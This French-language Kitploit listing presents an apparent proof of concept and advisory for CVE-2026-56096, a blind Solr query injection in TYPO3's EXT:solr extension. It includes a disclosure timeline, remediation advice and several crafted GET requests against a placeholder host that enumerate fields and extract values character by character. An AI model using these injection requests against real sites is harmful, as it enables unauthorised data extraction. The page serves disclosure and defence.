Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-56096 — Preuve de concept et analyse technique pour CVE-2026-56096, une injection de requête Solr à l'aveugle dans TYPO3 EXT:solr permettant l'énumération de champs et l'extraction de données sans authentification. | Kitploit
Outils/GitHubGitHub/yairhinkis/cve-2026-56096
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebArticles et Recherche
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Preuve de concept et analyse technique pour CVE-2026-56096, une injection de requête Solr à l'aveugle dans TYPO3 EXT:solr permettant l'énumération de champs et l'extraction de données sans authentification.

Voir le dépôt
il y a 9h 54mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-56096 : Injection de requête Solr et extraction aveugle de données dans TYPO3 EXT:solr

Une vulnérabilité de sécurité architecturale a été découverte dans l'extension officielle TYPO3 Apache Solr (EXT:solr / apache-solr-for-typo3/solr). Le problème permet à des attaquants distants non authentifiés d'injecter une syntaxe de requête Solr/Lucene arbitraire via le paramètre de recherche tx_solr[q], ce qui permet une énumération aveugle non autorisée des champs et une extraction complète des métadonnées de l'index de recherche.


Métadonnées

  • ID CVE : CVE-2026-56096
  • Type de vulnérabilité : CWE-943 : Neutralisation incorrecte d'éléments spéciaux dans la logique de requête de données
  • Composant cible : EXT:solr (Paramètre de recherche : tx_solr[q])
  • Score CVSS v4.0 : 6.3 (Moyen) —
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Chercheur : Yair Hinkis

  • Aperçu de la vulnérabilité

    L'extension EXT:solr accepte les termes de recherche fournis par l'utilisateur via le paramètre tx_solr[q] et les transmet au moteur Apache Solr. Par conception, l'extension autorise des opérateurs de requête spécifiques — tels que les jokers (*), les jokers d'un seul caractère (?), les sélecteurs de champ (:) et les requêtes de plage ([a TO z]) — pour prendre en charge des fonctionnalités légitimes comme le filtrage à facettes.

    Étant donné que ces caractères étaient transmis directement à la construction de la requête backend sans liste blanche restrictive ni couche d'abstraction de requête, un attaquant peut fournir une syntaxe spécifique à un champ pour échapper aux limites de recherche prévues. Cela permet à des utilisateurs non authentifiés d'interroger directement des champs Solr internes et d'extraire des données de l'index à l'aide de techniques aveugles basées sur des booléens.


    Techniques d'attaque

    1. Énumération de champs via field:*

    En ajoutant un joker à un nom de champ arbitraire ou deviné, un attaquant peut vérifier si le champ existe dans le schéma :

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    Si le champ existe, Solr traite la requête sur tous les enregistrements correspondants (déclenchant souvent des codes de réponse distincts ou des comportements liés au volume), ce qui permet une énumération automatisée des champs basée sur des listes de mots.


    2. Extraction aveugle de valeurs via des jokers de préfixe

    Les attaquants peuvent extraire des valeurs de champs sensibles caractère par caractère en utilisant une inférence booléenne :

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Returns search hits (Value begins with 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Value does not begin with 'b')
    
    

    3. Détection de longueur via l'opérateur ?

    L'opérateur joker d'un seul caractère (?) peut déterminer la longueur exacte d'une chaîne stockée avant de commencer l'itération des caractères :

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Checks for 12+ characters)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Checks for 13+ characters)
    
    

    4. Requêtes de plage accélérées ([a TO z])

    Les requêtes de plage permettent une extraction par recherche binaire sur le caractère initial, réduisant le nombre de requêtes nécessaires de 26 à environ 5 par position de caractère :

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determines if character falls within 'a'-'m'
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determines if character falls within 'n'-'z'
    
    

    La combinaison de la détection de longueur, des requêtes de plage et des jokers de préfixe permet une extraction complète des champs avec une empreinte de requêtes minimale.


    Impact

    • Violation de la confidentialité : Extraction complète de tous les champs indexés dans Apache Solr (par exemple, hachages système internes, contenu de pages masquées, métadonnées liées aux utilisateurs et identifiants système).
    • Contournement du contrôle d'accès : Contourne les filtres de recherche frontend et les restrictions d'affichage TypoScript.
    • Portée : Affectait toutes les installations par défaut utilisant le point de terminaison de recherche EXT:solr.

    Remédiation

    L'échappement global des caractères est insuffisant car des opérateurs comme * et : servent des fonctionnalités de recherche prévues. La remédiation nécessite une liste blanche au niveau de la couche applicative et un modèle d'analyse :

    1. Analyser les chaînes de requête fournies par l'utilisateur dans un arbre syntaxique abstrait (AST) avant de les transmettre au moteur Solr.
    2. Appliquer des listes blanches strictes sur les cibles de champs autorisées, en interdisant les requêtes directes des utilisateurs contre des champs internes ou restreints.
    3. Neutraliser l'abus d'opérateurs non autorisés provenant de contextes d'entrée non fiables.

    Chronologie de divulgation coordonnée

    • 6 mars 2026 : Identification de la vulnérabilité lors d'une évaluation autorisée ; notification initiale du fournisseur.
    • 17 avril 2026 : Le fournisseur a mis en œuvre des mesures d'atténuation locales en périphérie ; confirmation de la nature du bug en amont.
    • 8 mai 2026 : Rapport de vulnérabilité formel soumis à l'équipe de sécurité TYPO3 ([email protected]).
    • 15 juin 2026 : L'équipe de sécurité TYPO3 a confirmé la reproduction et initié le développement d'un correctif avec les mainteneurs de l'extension.
    • 25 août 2026 : Bulletin de sécurité officiel publié, correctif publié et CVE-2026-56096 attribué.

    Références

    • Avis de sécurité TYPO3 : TYPO3-EXT-SA-2026-025
    • Définition CWE : CWE-943: Improper Neutralization of Special Elements in Data Query Logic
    Télécharger l’outil